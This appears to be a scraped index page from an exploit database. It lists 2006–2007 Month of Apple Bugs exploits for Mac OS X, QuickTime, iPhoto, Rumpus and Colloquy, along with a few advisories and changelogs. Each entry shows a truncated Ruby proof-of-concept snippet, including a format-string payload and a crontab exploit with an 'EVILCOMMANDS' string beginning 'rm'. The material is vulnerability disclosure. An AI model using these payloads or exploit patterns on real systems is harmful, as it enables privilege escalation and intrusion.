Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST
!/usr/bin/ruby Copyright c Lance M. Havok Kevin Finisterre Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 || "localhost" targetuser = ARGV2 || "anonymous" targetpass = ARGV3 || "rumproast" def listbugo...
Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit
No description provided by source. !/usr/bin/ruby c Copyright 2006 Lance M. Havok [email protected] Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick =...
Fedora Core 6 : ruby-1.8.5-4.fc6 (2006-1109)
Fri Oct 27 2006 Akira TAGOH - 1.8.5-4 - security fix release. - ruby-1.8.5-cgi-CVE-2006-5467.patch: fix a CGI multipart parsing bug that causes the denial of service. 212396 - Sun Oct 1 2006 Jesse Keating - 1.8.5-3 - rebuilt for unwind info generation, broken in gcc-4.1.1-21 - Tue Sep 26 2006...
Fedora Core 5 : ruby-1.8.5-1.fc5 (2006-1110)
Fri Oct 27 2006 Akira TAGOH - 1.8.5-1 - security fix release. - ruby-1.8.5-cgi-CVE-2006-5467.patch: fix a CGI multipart parsing bug that causes the denial of service. 212396 - backport fixes from devel. - fixed rbconfig.rb to refer to DESTDIR for sitearchdir. 207311 - updates to 1.8.5 - removed...
Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
!/usr/bin/ruby c Copyright 2006 Lance M. Havok Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick = "spongebo" channeljoined = false readytogo = false...
MOAB-05-01-2007.rb.txt
!/usr/bin/ruby c 2006 LMH Kevin Finisterre Thanks to The French Connection for bringing this in-the-wild 0-day to our attention. If /tmp/ps2 exists on your system, you've been pwned already. Thanks to the original authors of the exploit 'meow'. You know who you are. "They did it for the lulz" - A...
MOAB-09-01-2007.rb.txt
!/usr/bin/ruby c 2006 LMH . require 'fileutils' require 'zlib' hdiutil = "/usr/bin/hdiutil" dmgname = ARGV0 || "MOAB-09-01-2007.dmg" dmgsize = ARGV1 || "200k" filesys = ARGV2 || "UFS" volname = "" 255.times do volname i = Kernel.rand62; i += i 10 ? 48 : i 36 ? 55 : 61 .chr end FileUtils.rmfdmgnam...
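Apple iLife iPhoto PhotoCast XML Remote Format String Vulnerability
Apple iLife iPhoto PhotoCast is a tool for sharing photos on websites. Apple iLife iPhoto PhotoCast has a flaw in how it handles XML feeds; a remote attacker can exploit the vulnerability to carry out a format string attack, possibly executing arbitrary instructions with the privileges of the application process. By constructing a special iPhoto photocast XML feed, a malicious user can cause iPhoto PhotoCast to hit a format string error when processing the "title" element, resulting in remote arbitrary code execution. Apple iLife iPhoto 6.0.5 316 No detailed solution is currently available: http://www.apple.com/ilife/iphoto/...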
Application Enhancer (APE) 2.0.2 Local Privilege Escalation Exploit
Exploit for macOS platform in category local exploits =================================================================== Application Enhancer APE 2.0.2 Local Privilege Escalation Exploit =================================================================== !/usr/bin/ruby Exploit Of The Apes: A...
Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation
!/usr/bin/ruby c 2006 LMH Kevin Finisterre Thanks to The French Connection for bringing this in-the-wild 0-day to our attention. If /tmp/ps2 exists on your system, you've been pwned already. Thanks to the original authors of the exploit 'meow'. You know who you are. "They did it for the lulz" - A...
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
!/usr/bin/ruby c 2006 LMH code from the other exploit, porting Kevin Finisterre crontab rock and roll Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one. And works like a charm. require 'fileutils' EVILCOMMANDS = "rm...
Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
Exploit for macOS platform in category local exploits ===================================================================== Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit ===================================================================== !/usr/bin/ruby c 2006 LMH Kevin...
MOAB-04-01-2007.rb.txt
!/usr/bin/ruby c 2006 LMH bug by Kevin Finisterre proof of concept for MOAB-04-01-2007 see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb require 'socket' IPHOTOFEED = "\r\n" + "\r\n" + "\r\n" + "" + "A" 256 + "%x.%n.%n.%n.%n.%n\r\n" + "\r\n" + "In Gruber We Trust\r\n" +...
iLife iPhoto Photocast (XML title) Remote Format String PoC
No description provided by source. !/usr/bin/ruby c 2006 LMH lmh at info-pull.com bug by Kevin Finisterre kflists at digitalmunition.com proof of concept for MOAB-04-01-2007 see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb require 'socket' IPHOTOFEED = "?xml version="1.0"...
iLife iPhoto Photocast (XML title) Remote Format String PoC
Exploit for macOS platform in category dos / poc =========================================================== iLife iPhoto Photocast XML title Remote Format String PoC =========================================================== !/usr/bin/ruby c 2006 LMH bug by Kevin Finisterre proof of concept for...
MOAB-01-01-2007.rb.txt
!/usr/bin/ruby Copyright c LMH Kevin Finisterre Notes: Our command string is loaded on memory at a static address normally, but this depends on execution method and the string length. The address set in this exploit will be likely successful if we open the resulting QTL file directly, without...
MOAB-03-01-2007.rb.txt
!/usr/bin/ruby c 2006 LMH Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the fake FTP server required. HTTP server port can be modified but it's not recommended. Adjust as...
Apple Quicktime <= 7.1.3 (HREFTrack) Cross-Zone Scripting Exploit
No description provided by source. !/usr/bin/ruby c 2006 LMH lmh at info-pull.com Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the...
Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit
No description provided by source. !/usr/bin/ruby Copyright c LMH lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Notes: Our command string is loaded on memory at a static address normally,...
[SA23465] tDiary Unspecified Ruby Code Execution Vulnerability
TITLE: tDiary Unspecified Ruby Code Execution Vulnerability SECUNIA ADVISORY ID: SA23465 VERIFY ADVISORY: http://secunia.com/advisories/23465/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: tDiary 2.x http://secunia.com/product/5496/ DESCRIPTION: Takagi Hiroshi has...